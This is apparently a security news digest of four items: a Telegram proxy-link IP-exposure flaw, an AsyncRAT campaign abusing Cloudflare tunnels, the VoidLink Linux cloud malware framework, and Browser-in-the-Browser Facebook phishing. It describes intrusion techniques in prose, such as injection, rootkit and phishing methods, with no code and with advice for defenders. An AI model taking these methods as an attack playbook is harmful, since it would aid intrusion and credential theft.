Hidden Telegram Proxy Links Enable One-Click IP Address Exposure
Researchers have disclosed a Telegram client behavior that allows attackers to expose a user’s real IP address with a single click by abusing how MTProto proxy links are handled on mobile platforms. Specially crafted t[.]me/proxy links can be visually disguised as benign Telegram usernames or ordinary links, yet when tapped on Android or iOS clients, Telegram automatically attempts a test connection to the specified proxy server. This connection occurs before any user confirmation and bypasses existing proxy configurations, causing the device to initiate a direct outbound request to attacker-controlled infrastructure. As a result, the proxy operator can immediately log the user’s true IP address, enabling deanonymization, rough geolocation, and follow-on targeting with minimal user interaction. The technique has been compared to legacy auto-authentication leaks, such as NTLM hash disclosures, where background network requests are triggered without explicit user awareness. While Telegram has stated that IP visibility is inherent to internet communications and not unique to its platform, it acknowledged the potential for abuse and confirmed plans to introduce user warnings when proxy links are clicked. Until mitigations are broadly deployed, this behavior presents a low-effort, high-confidence targeting vector against journalists, activists, and users relying on Telegram proxies for anonymity. Users are advised to treat disguised Telegram links with caution and avoid interacting with proxy links from untrusted sources, particularly in high-risk or adversarial environments.
Update: AsyncRAT Campaign Abuses Cloudflare Tunnels and Legitimate Python Environments for Stealthy Deployment
Trend Micro researchers analyzing a recent AsyncRAT campaign observed threat actors abusing Cloudflare’s free-tier infrastructure and TryCloudflare tunneling domains to host malicious WebDAV servers, effectively concealing payload delivery behind widely trusted cloud services. The infection chain begins with phishing emails distributing Dropbox-hosted ZIP archives containing double-extension Internet Shortcut files ([.]pdf[.]url), which redirect victims to attacker-controlled TryCloudflare endpoints when opened. These shortcut files invoke Windows Script Host components that retrieve additional scripts from Cloudflare-backed infrastructure, enabling the attackers to stage payload delivery in a manner that blends into normal enterprise traffic. To further suppress user suspicion, the malware routinely opens legitimate PDF documents during execution, creating the illusion of benign activity while the malicious workflow continues in the background. The campaign’s technical sophistication is further demonstrated by its use of legitimate Python downloads from the official Python website to establish a complete execution environment on victim systems, enabling the malware to run trusted binaries rather than custom droppers. Once installed, Python-based loaders decrypt and inject AsyncRAT shellcode into explorer[.]exe using polymorphic APC injection, enabling stealthy remote access and process-level evasion. Persistence is achieved through multiple mechanisms, including startup folder batch scripts, WebDAV-mounted payload execution, and extensive abuse of living-off-the-land utilities such as PowerShell, rundll32[.]exe, and svchost[.]exe, significantly complicating detection and forensic response. Defenders should harden email filtering against double-extension attachments, restrict script execution from user-writable directories, monitor for anomalous Python installations, and code injection into explorer[.]exe, and block or closely inspect outbound traffic to cloud tunneling services such as TryCloudflare.
VoidLink: Advanced Cloud-Native Linux Malware Targets Containerized and Cloud Environments
Check Point Research has disclosed a previously undocumented Linux malware framework dubbed VoidLink, designed for long-term, stealthy access to modern cloud and container environments. First identified in December 2025, VoidLink is assessed to be developed by Chinese-affiliated threat actors and represents a marked shift toward cloud-first post-exploitation tooling. Written primarily in Zig, the framework is highly modular and built around a custom plugin API inspired by Cobalt Strike’s Beacon Object Files, enabling operators to dynamically extend or modify capabilities during operations. VoidLink can identify major cloud providers, including AWS, Azure, GCP, Alibaba, and Tencent, detect Docker and Kubernetes environments, and harvest cloud, developer, and source-code credentials, suggesting potential use cases spanning espionage, long-term surveillance, and supply-chain intrusion scenarios targeting developers and cloud operators. Technically, VoidLink combines user-mode and kernel-level tradecraft to achieve adaptive stealth across monitored environments. Its capabilities include rootkit techniques using LD_PRELOAD, loadable kernel modules, and eBPF; in-memory plugin execution; and multi-protocol C2 over HTTP(S), WebSocket, DNS, ICMP, and emerging mesh-style P2P communications. The framework profiles host security controls and dynamically adjusts behavior to evade detection, including slowing activity in hardened environments, encrypting code at runtime, and self-deleting upon tampering. A full-featured Chinese-language web dashboard allows operators to build custom implants, deploy plugins, manage persistence, conduct lateral movement, and erase forensic artifacts. Although no confirmed widespread infections have been observed to date, VoidLink’s sophistication, rapid development cadence, and cloud-centric design underscore the growing strategic focus on Linux-based cloud infrastructure as a high-value target for advanced threat actors.
Update: Browser-in-the-Browser Facebook Phishing Campaigns Exploit Trusted Infrastructure and Visual Deception
Security researchers at Trellix have observed a surge in sophisticated Facebook phishing campaigns in the second half of 2025 that leverage the Browser-in-the-Browser (BitB) technique to harvest user credentials at scale. These attacks typically begin with spearphishing emails impersonating law firms, Meta security teams, or copyright enforcement notices, warning victims of account violations, unauthorized logins, or imminent suspension. Embedded links, often masked behind URL shorteners or fake CAPTCHA pages, redirect users to attacker-controlled sites that simulate legitimate Facebook authentication pop-ups within the browser window. By hardcoding real Facebook URLs and mimicking authentic login dialogs, BitB attacks exploit users’ familiarity with standard authentication flows, making the phishing interface nearly indistinguishable from a genuine login prompt. The campaigns further evade detection by abusing trusted cloud hosting platforms, including Netlify and Vercel, to host phishing infrastructure, lending legitimacy to malicious pages and bypassing traditional security filters. Victims are frequently guided through multi-step appeal forms that collect personal details before prompting for account passwords, enabling full account takeover once credentials are submitted. Trellix notes that this combination of trusted infrastructure abuse, URL redirection services, and advanced visual deception represents a significant escalation over traditional Facebook phishing activity. The technique underscores how attackers are shifting away from easily detectable malicious domains toward living-off-the-cloud tactics that undermine user trust and challenge conventional email and web defenses, reinforcing the need for layered protections and heightened scrutiny of in-browser login prompts.
